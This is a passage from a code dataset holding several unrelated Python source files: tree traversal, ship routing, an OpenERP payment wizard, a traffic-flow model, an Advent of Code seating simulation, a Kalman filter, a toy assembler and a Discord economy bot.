== None:\n return []\n\n q = [root]\n ans = []\n\n # visit by level\n while len(q) > 0:\n next_level = []\n num = []\n\n while len(q) > 0:\n cur = q.pop(0)\n num.append(cur.val)\n if cur.left != None:\n next_level.append(cur.left)\n if cur.right != None:\n next_level.append(cur.right)\n\n ans.insert(0, num)\n q = next_level\n\n return ans\n","sub_path":"leetans/levelOrderII.py","file_name":"levelOrderII.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"159751609","text":"import numpy as np\nimport datetime as dt\nfrom typing import NamedTuple\nimport json\nimport dateutil.parser\n\nimport utils\nimport matplotlib.pyplot as plt\nimport graphics\nfrom utils import NumpyArrayEncoder\n\n\nclass RouteParams():\n \"\"\"\n Isochrone data structure with typing.\n Parameters:\n count: int (routing step)\n start: tuple (lat,long at start)\n finish: tuple (lat,lon and end)\n gcr_azi: float (initial gcr heading)\n lats1, lons1, azi1, s12: (M, N) arrays, N=headings+1, M=number of steps+1 (decreasing step number)\n azi0, s0: (M, 1) vectors without history\n time1: current datetime\n elapsed: complete elapsed timedelta\n \"\"\"\n count: int # routing step\n start: tuple # lat, lon at start\n finish: tuple # lat, lon at end\n fuel: float\n full_dist_traveled: tuple\n gcr: tuple\n rpm: int # propeller [revolutions per minute]\n route_type: str # route name\n time: dt.timedelta # time needed for the route [datetime]\n fuel_per_step: tuple # sum of power consumption [W]\n lats_per_step: tuple # lats: (M,N) array, N=headings+1, M=steps (M decreasing)\n lons_per_step: tuple # longs: (M,N) array, N=headings+1, M=steps\n azimuths_per_step: tuple # azimuth: (M,N) array, N=headings+1, M=steps [degree]\n dists_per_step: tuple # geodesic distance traveled per time stamp: (M,N) array, N=headings+1, M=steps [m]\n speed_per_step: tuple # boat speed per step [m/s]\n starttime_per_step: tuple\n full_dist_traveled: tuple # full geodesic distance since start [m]\n\n def __init__(self, count, start, finish, fuel, full_dist_traveled,gcr, rpm, route_type, time, lats_per_step, lons_per_step, azimuths_per_step, dists_per_step, speed_per_step, starttime_per_step, fuel_per_step):\n self.count = count # routing step\n self.start = start # lat, lon at start\n self.finish = finish # lat, lon at end\n self.fuel = fuel # sum of fuel consumption [kWh]\n self.full_dist_traveled = full_dist_traveled #full travel distance [m]\n self.gcr = gcr\n self.rpm = rpm # propeller [revolutions per minute]\n self.route_type = route_type # route name\n self.time = time # time needed for the route [h]\n self.lats_per_step = lats_per_step\n self.lons_per_step = lons_per_step\n self.azimuths_per_step = azimuths_per_step # [degrees]\n self.dists_per_step = dists_per_step #travel distance per step [m]\n self.speed_per_step = speed_per_step #speed per step [m/s]\n self.starttime_per_step =starttime_per_step\t# time at start of every step\n self.fuel_per_step = fuel_per_step \t#fuel consumption per step [kWh]\n\n def print_route(self):\n utils.print_line()\n print('Printing route: ' + str(self.route_type))\n print('Going from', self.start)\n print('to')\n print(self.finish)\n print('routing steps ' + str(self.count))\n print('time ' + str(self.time))\n print('fuel ' + str(self.fuel))\n print('full_dist_traveled ' + str(self.full_dist_traveled))\n print('gcr ' + str(self.gcr))\n print('rpm ' + str(self.rpm))\n print('lats_per_step ' + str(self.lats_per_step))\n print('lons_per_step ' + str(self.lons_per_step))\n print('azimuths_per_step ' + str(self.azimuths_per_step))\n print('dists_per_step ' + str(self.dists_per_step))\n print('speed_per_step ' + str(self.speed_per_step))\n print('start_time_per_step' + str(self.starttime_per_step))\n print('fuel_per_step' + str(self.fuel_per_step))\n utils.print_line()\n\n def __eq__(self, route2):\n bool_equal=True\n if not (self.count == route2.count):\n raise ValueError('Route counts not matching')\n if not (np.array_equal(self.start, route2.start)):\n raise ValueError('Route start not matching')\n if not (np.array_equal(self.finish, route2.finish)):\n raise ValueError('Route finsh not matching')\n if not (np.array_equal(self.time, route2.time)):\n raise ValueError('Route time not matching: self=' + str(self.time) + ' other=' + str(route2.time))\n if not (np.array_equal(self.fuel, route2.fuel)):\n raise ValueError('Route fuel not matching: self=' + str(self.fuel) + ' other=' + str(route2.fuel))\n if not (np.array_equal(self.rpm, route2.rpm)):\n raise ValueError('Route rpm not matching')\n if not (np.array_equal(self.lats_per_step, route2.lats_per_step)):\n raise ValueError('Route lats_per_step not matching')\n if not (np.array_equal(self.lons_per_step, route2.lons_per_step)):\n raise ValueError('Route lons_per_step not matching')\n if not (np.array_equal(self.azimuths_per_step, route2.azimuths_per_step)):\n raise ValueError('Route azimuths_per_step not matching')\n if not (np.array_equal(self.dists_per_step, route2.dists_per_step)):\n raise ValueError('Route dists_per_step not matching')\n if not (np.array_equal(self.full_dist_traveled, route2.full_dist_traveled)):\n raise ValueError('Route full_dist_traveled not matching')\n\n return bool_equal\n\n def convert_to_dict(self):\n rp_dict = {\n \"count\" : self.count,\n \"start\" : self.start,\n \"finish\": self.finish,\n \"fuel\": self.fuel,\n \"full_dist_traveled\": self.full_dist_traveled,\n \"gcr\": self.gcr,\n \"rpm\" : self.rpm,\n \"route type\" : self.route_type,\n \"time\" : self.time,\n \"fuel_per_step\" : self.fuel_per_step,\n \"lats_per_step\" : self.lats_per_step,\n \"lons_per_step\" : self.lons_per_step,\n \"azimuths_per_step\" : self.azimuths_per_step,\n \"dists_per_step\" : self.dists_per_step,\n \"speed_per_step\" : self.speed_per_step,\n \"starttime_per_step\" : self.starttime_per_step,\n }\n return rp_dict\n\n def write_to_file(self, filename):\n rp_dict = self.convert_to_dict()\n with open(filename, 'w') as file:\n json.dump(rp_dict, file, cls=NumpyArrayEncoder, indent=4)\n\n @classmethod\n def from_file(cls, filename):\n with open(filename) as file:\n rp_dict = json.load(file)\n\n count = rp_dict['count']\n start = rp_dict['start']\n finish = rp_dict['finish']\n fuel = rp_dict['fuel']\n full_dist_traveled = rp_dict['full_dist_traveled']\n gcr = rp_dict['gcr']\n rpm = rp_dict['rpm']\n route_type = rp_dict['route type']\n time = rp_dict['time']\n lats_per_step = np.asarray(rp_dict['lats_per_step'])\n lons_per_step = np.asarray(rp_dict['lons_per_step'])\n azimuths_per_step = np.asarray(rp_dict['azimuths_per_step'])\n dists_per_step = np.asarray(rp_dict['dists_per_step'])\n speed_per_step = np.asarray(rp_dict['speed_per_step'])\n starttime_per_step = np.asarray(rp_dict['starttime_per_step'])\n fuel_per_step = np.asarray(rp_dict['fuel_per_step'])\n\n return cls(\n count = count,\n start = start,\n finish = finish,\n fuel = fuel,\n full_dist_traveled = full_dist_traveled,\n gcr = gcr,\n rpm = rpm,\n route_type = route_type,\n time = time,\n lats_per_step = lats_per_step,\n lons_per_step = lons_per_step,\n azimuths_per_step = azimuths_per_step,\n dists_per_step = dists_per_step,\n speed_per_step = speed_per_step,\n starttime_per_step = starttime_per_step,\n fuel_per_step = fuel_per_step\n )\n def plot_route(self, ax, colour, label):\n lats = self.lats_per_step\n lons = self.lons_per_step\n ax.plot(lons, lats, color = colour, label = label, linewidth=2)\n\n ax.plot(self.start[1], self.start[0], marker=\"o\", markerfacecolor=colour, markeredgecolor=colour,\n markersize=10)\n ax.plot(self.finish[1], self.finish[0], marker=\"o\", markerfacecolor=colour, markeredgecolor=colour,\n markersize=10)\n return ax\n\n def plot_power_vs_dist(self, color, label):\n power = self.fuel_per_step\n dist = self.dists_per_step\n lat = self.lats_per_step\n lon = self.lons_per_step\n\n dist = dist/1000 # [m] -> [km]\n hist_values = graphics.get_hist_values_from_widths(dist, power)\n\n plt.bar(hist_values[\"bin_centres\"], hist_values[\"bin_content\"], dist, fill=False, color = color, edgecolor = color, label = label)\n plt.xlabel('Weglänge (km)')\n plt.ylabel('Energie (kWh/km)')\n plt.xticks()\n","sub_path":"Isochrone/routeparams.py","file_name":"routeparams.py","file_ext":"py","file_size_in_byte":8875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"185448469","text":"# -*- coding: utf-8 -*-\nfrom openerp.osv import fields, osv\nfrom openerp.tools.translate import _\nimport openerp.addons.decimal_precision as dp\n\nclass account_payment_order_wizard(osv.osv_memory):\n _name =\"account.payment.order.wizard\"\n _inherit ='payment.document'\n _columns = {\n\n }\n \n def fields_view_get(self, cr, uid, view_id=None, view_type='form',\n context=None, toolbar=False, submenu=False):\n \"\"\"\n Changes the view dynamically\n @param self: The object pointer.\n @param cr: A database cursor\n @param uid: ID of the user currently logged in\n @param context: A standard dictionary\n @return: New arch of view.\n \"\"\"\n if context is None:\n context={}\n if 'active_ids' in context and len(context.get('active_ids')) > 1:\n self.pool.get('account.voucher').validate_transaction(cr, uid, context.get('active_ids'), context)\n \n res = super(account_payment_order_wizard, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar,submenu=False)\n return res\n\n \n def default_get(self, cr, uid, fields, context=None):\n if context is None:\n context = {}\n res = super(account_payment_order_wizard, self).default_get(cr, uid, fields, context=context)\n \n if 'active_ids' in context:\n band_first = True\n amount = 0.0\n my_checkbook = ''\n line_ids = []\n aux = []\n for voucher_id in self.pool.get('account.voucher').browse(cr, uid, context.get('active_ids'), context):\n if band_first:\n type = voucher_id.type\n res.update({'date': voucher_id.date })\n res.update({'partner_id': voucher_id.partner_id.id })\n if not type == 'payment':\n account_id = voucher_id.pay_mode_id.journal.default_credit_account_id.id\n else:\n account_id = voucher_id.pay_mode_id.journal.default_debit_account_id.id\n res.update({'account_id': account_id })\n res.update({'pay_mode_id': voucher_id.pay_mode_id.id })\n res.update({'type': voucher_id.type })\n res.update({'company_id': self.pool.get('res.users').browse(cr, uid, uid, context).company_id.id })\n res.update({'is_check': voucher_id.pay_mode_id.is_check })\n if voucher_id.pay_mode_id.is_check:\n # Obtengo la cuenta bancaria asociada al modo de pago\n mp_bank_id = voucher_id.pay_mode_id.bank_id.id\n list_checkb = self.pool.get('account.checkbook').search(cr, uid, [('account_bank_id', '=', mp_bank_id)])\n for check_b in list_checkb:\n my_checkbook = self.pool.get('account.checkbook').browse(cr, uid, check_b, context).actual_number\n res.update({'check_number': my_checkbook })\n band_first = False\n res.update({'number': voucher_id.number })\n res.update({'reference': voucher_id.reference })\n res.update({'journal_id': voucher_id.journal_id.id })\n res.update({'state': voucher_id.state })\n amount += voucher_id.amount\n res.update({'amount': voucher_id.amount })\n res.update({'date': voucher_id.date })\n # aux.append((0, 0, var_temp))\n if type == 'payment':\n for line in voucher_id.line_dr_ids:\n line_ids.append(line.id)\n if type == 'receipt':\n for line in voucher_id.line_cr_ids:\n line_ids.append(line.id)\n# res.update({'voucher_ids' : aux })\n res.update({'amount': amount })\n \n if type == 'payment':\n res.update({'line_dr_ids': line_ids })\n if type == 'receipt':\n res.update({'line_cr_ids': line_ids })\n return res\n\n# Aquí tengo que registrar el cheque\n# Aumentar la secuencia del cheque\n# Cambiar a estado \"Posted\" los Voucher seleccionados \n\n\n def save_transaction(self, cr, uid, ids, context):\n vals = {}\n for form in self.browse(cr, uid, ids): \n # Conformando los valores a salvar el pay_doc\n if form.check_number:\n vals['check_number'] = form.check_number\n vals['partner_id'] = form.partner_id.id\n vals['pay_mode_id'] = form.pay_mode_id.id\n vals['amount'] = form.amount\n vals['date'] = form.date\n vals['res_partner_id'] = form.res_partner_id.id\n vals['pay_reason'] = form.pay_reason\n vals['type'] = form.type\n vals['company_id'] = 1\n vals['state'] = 'open'\n\n # obj_pay_doc = self.pool.get('payment.document')\n # id = obj_pay_doc.create(cr, uid, vals, context=context)\n \n \n\n return {'type': 'ir.actions.act_window_close'}\n \n\n \naccount_payment_order_wizard()\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:","sub_path":"bit_payment/wizard/account_payment_order_wizard.py","file_name":"account_payment_order_wizard.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"481412203","text":"def update_on_device(self):\n params = self.changes.api_params()\n uri = 'https://{0}:{1}/mgmt/tm/gtm/server/{2}/virtual-servers/{3}'.format(self.client.provider['server'], self.client.provider['server_port'], transform_name(self.want.partition, self.want.server_name), self.want.name)\n resp = self.client.api.patch(uri, json=params)\n try:\n response = resp.json()\n except ValueError as ex:\n raise F5ModuleError(str(ex))\n if (('code' in response) and (response['code'] == 400)):\n if ('message' in response):\n raise F5ModuleError(response['message'])\n else:\n raise F5ModuleError(resp.content)","sub_path":"Data Set/bug-fixing-4/041da7516d72aa5d06c32fc6312a6e500624e540--bug.py","file_name":"041da7516d72aa5d06c32fc6312a6e500624e540--bug.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"49841333","text":"import numpy\nimport matplotlib.pyplot as plt\n\nVmax = 136. # km/hr\nL = 11. # km\nrhomax = 250. # cars/km\nnx = 51 #points\ndt = 0.001 #hr\ndelx = L/(nx-1)\nx = numpy.linspace(0, L, nx)\n\n#Initial condition \nrho0 = numpy.ones(nx)*20 \nrho0[10:20] = 50\nV = numpy.zeros(nx)\n\nrho = rho0.copy()\nfor i in range(nx):\n V[i] = Vmax * (1. - rho[i]/rhomax)\n\nprint(\"Maximum of rho0:\", numpy.max(rho0))\nprint(\"Minumum of V:\", numpy.min(V))\n\n# Solving equation for specified time\n# pay attention to parameter dimension\nTmax = 3./60.\nnomOfS = numpy.int(Tmax/dt)\n\nT = numpy.linspace(0, Tmax, nomOfS)\nrho = rho0.copy()\n\nfor j in range(nomOfS):\n rhon = rho.copy()\n for i in range(1, nx):\n rho[i] = rhon[i] - (dt/delx)*((rhon[i]*Vmax*(1.- (rhon[i]/rhomax))) - (rhon[i-1]*Vmax*(1.- (rhon[i-1]/rhomax))))\n # Remember Boundary condition\n rho[0] = 10.0\n\n# Calculatinf v based on computed density\nfor i in range(nx):\n V[i] = Vmax * (1. - rho[i]/rhomax)\n\nminvel = numpy.min(V)\n# minimum velocity (Pay attention to dimension)\nprint(\"minimum of velocity\", minvel * 1000. / 3600.)\n\n\nTotalflux = numpy.dot(rho,V) * delx\nTotalcars = numpy.sum(rho) * delx\nmeanvelocity = Totalflux/Totalcars\n# check dimension\nprint(\"Mean Velocity\", meanvelocity *1000. / 3600.)\n\nminInTime = numpy.min(V)\nprint (\"Minimum in specified time: \", minInTime * 1000./3600.)\n","sub_path":"traffic_flow.py","file_name":"traffic_flow.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"49302438","text":"from calcFunctions import constantFunction,functionMap\n\nnumPadList = [\n '7', '8', '9',\n '4', '5', '6',\n '1', '2', '3',\n '0', '.', '=',\n]\n\noperatorList = [\n '*', '/',\n '+', '-',\n '(', ')',\n 'C',\n]\n\n\nconstantList = [k[0] for k in constantFunction]\n\n\n\nfunctionList = [k[0] for k in functionMap]\n\n","sub_path":"keypad.py","file_name":"keypad.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"184366147","text":"#!/bin/python3\nimport sys\nimport numpy as np\nfilename = sys.argv[1] if len(sys.argv) > 1 else \"input\"\n\npart = (int(sys.argv[2]) if len(sys.argv) > 2 else None)\nwhile part is None:\n print(\"Part 1 or 2?\")\n reply = input(\"Choose: \")\n part = (int(reply) if reply == \"1\" or reply == \"2\" else None)\n\n# characters in problem statement\nFLOOR = \".\"\nEMPTY = \"L\"\nOCCUPIED = \"#\"\n\n# Show numpy grid\ndef show_grid(grid):\n for row in grid:\n print(\" \".join(map(str, row)))\n\n# Gets the adjacent surrounding seats of seat at r, c\ndef get_adjacent(seats, r, c):\n neighbors = np.zeros(seats.shape, dtype=bool)\n rows, cols = seats.shape\n adjacent = np.array([(r+i, c+j) for i in range(-1, 2) for j in range(-1, 2)\n if 0 <= r+i < rows and 0 <= c+j < cols and not (i == 0 and j == 0)])\n for nr, nc in adjacent:\n neighbors[nr, nc] = True\n return adjacent, neighbors\n\n# Gets visible seats from seat at r, c\ndef get_visible_chairs(seats, r, c):\n neighbors = np.zeros(seats.shape, dtype=bool)\n rows, cols = seats.shape\n valid = lambda row, col: (0 <= row < rows and 0 <= col < cols and not (row == r and col == c)\n and seats[row, col] != FLOOR)\n first = lambda x: np.array(x[0], dtype=int) if len(x) > 0 else np.array([-1, -1], dtype=int)\n W = np.array([(r, c-i) for i in range(cols) if valid(r, c-i)], dtype=int)\n E = np.array([(r, c+i) for i in range(cols) if valid(r, c+i)], dtype=int)\n N = np.array([(r-i, c) for i in range(cols) if valid(r-i, c)], dtype=int)\n S = np.array([(r+i, c) for i in range(cols) if valid(r+i, c)], dtype=int)\n NW = np.array([(r-i, c-i) for i in range(cols) if valid(r-i, c-i)], dtype=int)\n NE = np.array([(r-i, c+i) for i in range(cols) if valid(r-i, c+i)], dtype=int)\n SW = np.array([(r+i, c-i) for i in range(cols) if valid(r+i, c-i)], dtype=int)\n SE = np.array([(r+i, c+i) for i in range(cols) if valid(r+i, c+i)], dtype=int)\n visible = np.stack((first(W), first(E), first(N), first(S),\n first(NW), first(NE), first(SE), first(SW)))\n ok = np.all(visible >= 0, axis=1)\n for nr, nc in visible[ok]:\n neighbors[nr, nc] = True\n return visible[ok], neighbors\n\ndef initialize_neighbors(seats, positions):\n neighbors = {}\n for r, c in positions[seats != FLOOR]:\n neighbors[r, c] = (get_adjacent(seats, r, c) if part == 1 else get_visible_chairs(seats, r, c))\n return neighbors\n\n# Simulate one round of seating\ndef simulate_round(seats, positions, neighbors):\n limit = (4 if part == 1 else 5)\n simulation = seats.copy()\n flipped = np.where(seats == EMPTY, np.full(seats.shape, OCCUPIED), \n np.where(seats == OCCUPIED, np.full(seats.shape, EMPTY), np.full(seats.shape, FLOOR)))\n changed = np.zeros(seats.shape, dtype=bool)\n occupied = np.zeros(seats.shape, dtype=int)\n if np.all(seats != OCCUPIED): # if no seats are occupied\n chairs = (seats == EMPTY)\n simulation[chairs] = OCCUPIED\n changed[chairs] = True\n else: # else check each position that might change\n for r, c in positions[seats != FLOOR]:\n _, isneighbor = neighbors[r, c]\n occupied[r, c] = np.sum((seats[isneighbor] == OCCUPIED))\n changed = (((seats == EMPTY) & (occupied == 0)) | ((seats == OCCUPIED) & (occupied >= limit)))\n simulation = np.where(changed, flipped, seats)\n return changed, simulation\n\ndef solve(filename):\n seats = []\n with open(filename) as file:\n for line in file:\n line = line.rstrip()\n seats.append([c for c in line])\n seats = np.array(seats)\n rows, cols = seats.shape\n positions = np.array([[(r, c) for c in range(cols)] for r in range(rows)])\n round = 0\n print(\"---Initial Layout---\")\n show_grid(seats)\n print(\"Building neighbor list...\")\n neighbors = initialize_neighbors(seats, positions)\n print(\"===Simulation Begin===\")\n while True:\n changed, simulation = simulate_round(seats, positions, neighbors) # simulate round\n if np.any(changed): # if any seat changed, continue, otherwise, finish\n round += 1\n print(f\"---Round {round}---\")\n seats = simulation\n show_grid(seats)\n else:\n break\n print(f\"===Simulation Ended after {round} rounds===\")\n print(f\"Part {part} # occupied: {np.sum(seats == OCCUPIED)}\")\n \nif __name__ == '__main__':\n print(f\"Input file: {filename}\")\n import time\n start = time.time()\n solve(filename)\n end = time.time()\n print(f\"Solve time: {end-start} seconds\")","sub_path":"Day11/Day11.py","file_name":"Day11.py","file_ext":"py","file_size_in_byte":4326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"117498816","text":"import numpy as np\n\nimport pygame\nfrom pygame.locals import *\n\nclass Kalman:\n \"\"\"Implements Discrete-time Kalman filtering in a stateful fashion\n \"\"\"\n\n def __init__(self, manager):\n self.x = 0.0\n self.y = 0.0\n self.vx = 0.0\n self.vy = 0.0\n self.sig = 0.1\n self.sig_r = 0.1\n self.sig_q = 1.0\n self.manager = manager\n\n # process noise\n self.Er = np.array([[0.01], [0.01], [0.01], [0.01]])\n\n # measurement noise\n self.Eq = np.array([[0.01], [0.01], [0.01], [0.01]])\n\n # initialize belief state and covariance\n self.Mu = np.array([[self.x], [self.y], [self.vx], [self.vy]])\n self.var_S = np.array([10**-4, 10**-4, 10**-4, 10**-4])\n self.S = np.diag(self.var_S.flatten())\n\n # noiseless connection between state vector and measurement vector\n self.C = np.identity(4)\n\n # covariance of process noise model\n self.var_R = np.array([10**-6, 10**-6, 10**-5, 10**-5])\n self.R = np.diag(self.var_R.flatten())\n\n # covariance of measurement noise model\n self.var_Q = np.array([0.0156 * 10**-3, 0.0155 * 10**-3, 7.3811 * 10**-3, 6.5040 * 10**-3])\n self.Q = np.diag(self.var_Q.flatten())\n\n self.ready = False\n\n def done_waiting(self):\n \"\"\"Indicates filter readiness\n\n Returns:\n bool: Ready or not\n \"\"\"\n return self.ready\n\n def init_filter(self, pos, vel):\n \"\"\"Initializes filter. Meant to be run only at first.\n\n Args:\n pos (pygame.Vector2): Car position measurement\n vel (pygame.Vector2): Car velocity measurement\n \"\"\"\n self.x = pos[0]\n self.y = pos[1]\n self.vx = vel[0]\n self.vy = vel[1]\n self.X = np.array([[self.x], [self.y], [self.vx], [self.vy]])\n self.Mu = self.X\n self.ready = True\n\n def add(self, pos, vel):\n \"\"\"Add a measurement.\n\n Args:\n pos (pygame.Vector2): Car position measurement\n vel (pygame.Vector2): Car velocity measurement\n \"\"\"\n # pos and vel are the measured values. (remember x_bar)\n self.x = pos[0]\n self.y = pos[1]\n self.vx = vel[0]\n self.vy = vel[1]\n self.X = np.array([[self.x], [self.y], [self.vx], [self.vy]])\n\n self.predict()\n self.correct()\n\n def predict(self):\n \"\"\"Implement discrete-time Kalman filter prediction/forecast step\n \"\"\"\n # collect params\n dt = self.manager.get_sim_dt()\n dt2 = dt**2\n # motion model\n A = np.array([[1, 0, dt, 0], [0, 1, 0, dt], [0, 0, 1, 0], [0, 0, 0, 1]])\n\n # control model\n B = np.array([[0.5 * dt2, 0], [0, 0.5 * dt2], [dt, 0], [0, dt]])\n # B = np.array([[0, 0], [0, 0], [dt, 0], [0, dt]])\n\n # process noise covariance\n R = self.R\n\n command = self.manager.simulator.camera.acceleration\n U = np.array([[command[0]], [command[1]]])\n\n # predict\n self.Mu = np.matmul(A, self.Mu) + np.matmul(B, U)\n self.S = np.matmul(np.matmul(A, self.S), np.transpose(A)) + R\n\n def correct(self):\n \"\"\"Implement discrete-time Kalman filter correction/update step\n \"\"\"\n Z = self.X\n K = np.matmul(\n np.matmul(\n self.S, self.C), np.linalg.pinv(\n np.matmul(\n np.matmul(\n self.C, self.S), np.transpose(\n self.C)) + self.Q))\n\n self.Mu = self.Mu + np.matmul(K, (Z - np.matmul(self.C, self.Mu)))\n self.S = np.matmul((np.identity(4) - np.matmul(K, self.C)), self.S)\n\n def add_pos(self, pos):\n \"\"\"Add position measurement\n\n Args:\n pos (pygame.Vector2): Car position measurement\n \"\"\"\n self.add(pos, (self.vx, self.vy))\n\n def add_vel(self, vel):\n \"\"\"Add velocity measurement\n\n Args:\n vel (pygame.Vector2): Car velocity measurement\n \"\"\"\n self.add((self.x, self.y), vel)\n\n def get_pos(self):\n \"\"\"Get estimated car position\n\n Returns:\n pygame.Vector2: Car estimated position\n \"\"\"\n return pygame.Vector2(self.Mu.flatten()[0], self.Mu.flatten()[1])\n\n def get_vel(self):\n \"\"\"Get estimated car velocity\n\n Returns:\n pygame.Vector2: Car estimated velocity\n \"\"\"\n return pygame.Vector2(self.Mu.flatten()[2], self.Mu.flatten()[3])\n","sub_path":"vbot/experiments/exp_lc/kf.py","file_name":"kf.py","file_ext":"py","file_size_in_byte":4497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"574590904","text":"reg_8 = (\"ah\", \"al\", \"bh\", \"bl\", \"ch\", \"cl\", \"dh\", \"dl\")\nreg_16 = (\"ax\", \"bx\", \"cx\", \"dx\", \"si\", \"di\", \"bp\", \"sp\",)\nMOT = (\"add\",\"sub\",\"mov\",\"lea\",\"lds\",\"xchg\")\nDT = (\"db\",\"dw\",\"dd\")\nloc = 0\noffset = 0\nend_flag = 0\nflag = 1\nclass sym_table() :\n def __init__(self,var, offset, segment, var_type) :\n self.var = var\n self.offset = offset\n self.segment = segment\n self.var_type = var_type\n def __contains__(self,var) :\n return hasattr(self,var)\n def __contains__(self,var_type) :\n return hasattr(self,var_type)\n\nsym = []\n\n\ndef search_sym_table(var, var_type, n) : #function to check whether the symbol exists\n global loc\n global offset\n global end_flag\n offset = loc\n if \" \" in var :\n var = var.replace(\" \", \"!\")\n error(var,3) \n if var not in sym :\n if var_type == \"segment\" : #checking for segment in symbol table\n for x in sym :\n if (var_type in x) & (end_flag > 0) :\n loc = 0\n else :\n error(\"\",2) \n offset = loc\n loc = offset\n end_flag+=1\n segment = \"\\titself\"\n elif var_type == \"db\" :\n var_type = \"Byte\"\n offset = loc\n loc = offset + 8*n\n segment = \"\\tdata\"\n elif var_type == \"dw\" :\n var_type = \"Word\"\n offset = loc\n loc = offset + 16*n\n segment = \"\\tdata\"\n elif var_type == \"dd\" :\n var_type = \"Doubleword\"\n offset = loc\n loc = offset +32*n\n segment = \"\\tdata\"\n else :\n offset = loc\n loc = offset\n segment = \"\\tcode\"\n else :\n error(var,0)\n sym.append(sym_table(var.lstrip(), offset, segment, var_type))\n\ndef print_sym_table() : #to print symbol table\n print(\"\\t\",'='*72)\n print(\" | Symbol\\t| Offset | Segment \\t| Type\\t\\t|\")\n print(\"\\t\",'='*72)\n for i in sym :\n print(\"\\t| \",i.var,\"\\t| \", i.offset,\"H\\t |\", i.segment,\"\\t\\t| \", i.var_type,\"\\t\\t|\")\n print(\"\\t\",'='*72)\n # f = open(\"out.txt\",\"w\")\n # f.write()\n\ndef check_start() :\n if \"start\" in sym:\n return True\n else :\n return False\n\ndef error(x, y) :\n if y == 0:\n print(x, \"already declared\")\n elif y == 1 : #error for missing START\n print(\"START label not defined\")\n elif y == 2 :\n print(\"segment declared before ending previous segment\")\n elif y == 3 :\n print(x, \"syntax error in variable name\")\n\ndef calc_inst_size(instruction) :\n print(instruction)\n\ndef assemble(x) :\n global flag\n x=x.lower()\n n = 0\n if \";\" in x : #to check for comments in a line\n pos = x.find(\";\")\n if len(x[0:pos]) != 0 :\n x = x[0:pos]\n assemble(x)\n elif \"segment\" in x : #to check for segment in a line\n pos = x.find(\"segment\")\n var = x[0:pos].strip()\n search_sym_table(var, \"segment\", n)\n elif (\":\" in x) & ((\"assume\" not in x) or (\"cs:\" not in x) or (\"ds:\" not in x)) : #to check for label\n pos = x.find(\":\")\n var = x[0:pos]\n search_sym_table(var, \"label\", n)\n else :\n if flag == 1:\n for dt in DT : #loop to check for data directive\n dt=\" \"+dt\n if (dt in x) :\n pos = x.find(dt)\n var = x[0:pos].strip()\n var1 = x[pos+2:len(x)]\n n = var1.count(',') + 1\n search_sym_table(var, dt.lstrip(), n)\n # flag = 1\n # else :\n # flag = 0\n # else :\n # for mt in MOT :\n # if mt in x :\n # if check_start() :\n # calc_inst_size()\n # else :\n # error(\"\", 1)\n # flag = 1\n\n\n\ndef sourceline() : #to read source file line by line from an external file\n File = open(\"program.txt\",\"r\")\n f = File.readlines()\n for x in f :\n assemble(x) \n\ndef main() :\n '''Objective:\n '''\n #Approach\n sourceline()\n print_sym_table()\n\nif __name__ == \"__main__\" :\n main()","sub_path":"pmain.py","file_name":"pmain.py","file_ext":"py","file_size_in_byte":4454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"206999956","text":"import asyncio\nimport datetime\nimport discord\nimport os\nimport schedule\nimport sqlite3\nimport time\n\nimport economy_functions as ef\n\nfrom dotenv import load_dotenv\n\nDEPOSIT_RATE = 0.01\nLENDING_RATE = 0.02\n\n\ndef bank_balance(user):\n db = sqlite3.connect('main.sqlite')\n cursor = db.cursor()\n cursor.execute('SELECT dollars FROM bank_deposits WHERE user_id = ?',\n (user.id,))\n result = cursor.fetchone()\n if result is None:\n sql = ('INSERT INTO bank_deposits (user_id, dollars) VALUES(?, ?)')\n val = (user.id, 0)\n cursor.execute(sql, val)\n db.commit()\n ans = 0\n else:\n ans = round(result[0], 2)\n cursor.close()\n db.close()\n return f'{user.name} has {ans:.2f} dollars in deposits.'\n\n\ndef new_deposit(user, amount, guild_id):\n if (amount <= 0):\n return \"Please enter a positive amount.\"\n elif (ef.check_balance(user.id) < amount):\n return \"You do not have enough money on you.\"\n else:\n db = sqlite3.connect('main.sqlite')\n cursor = db.cursor()\n cursor.execute('SELECT dollars FROM bank_deposits WHERE user_id = ?',\n (user.id,))\n result = cursor.fetchone()\n if result is None:\n sql = ('INSERT INTO bank_deposits (user_id, dollars) VALUES(?, ?)')\n val = (user.id, amount)\n else:\n current_balance = result[0]\n sql = ('UPDATE bank_deposits SET dollars = ? WHERE user_id = ?')\n val = (current_balance + amount, user.id)\n cursor.execute(sql, val)\n db.commit()\n cursor.close()\n db.close()\n ef.ledger_update(\"Bank_Deposit\", guild_id, user.id, \"\\\"Bank\\\"\", amount)\n ef.money_transfer(\"\\\"Bank\\\"\", amount)\n ef.money_transfer(user.id, -amount)\n return f\"{user.name} deposited {amount:.2f} dollars.\"\n\n\ndef new_withdrawal(user, amount, guild_id):\n if (amount <= 0):\n return \"Please enter a positive amount.\"\n else:\n db = sqlite3.connect('main.sqlite')\n cursor = db.cursor()\n cursor.execute('SELECT dollars FROM bank_deposits WHERE user_id = ?',\n (user.id,))\n result = cursor.fetchone()\n if (result is None or result[0] < amount):\n cursor.close()\n db.close()\n return \"You do not have enough money in your account.\"\n else:\n current_balance = result[0]\n sql = ('UPDATE bank_deposits SET dollars = ? WHERE user_id = ?')\n val = (current_balance - amount, user.id)\n cursor.execute(sql, val)\n db.commit()\n cursor.close()\n db.close()\n 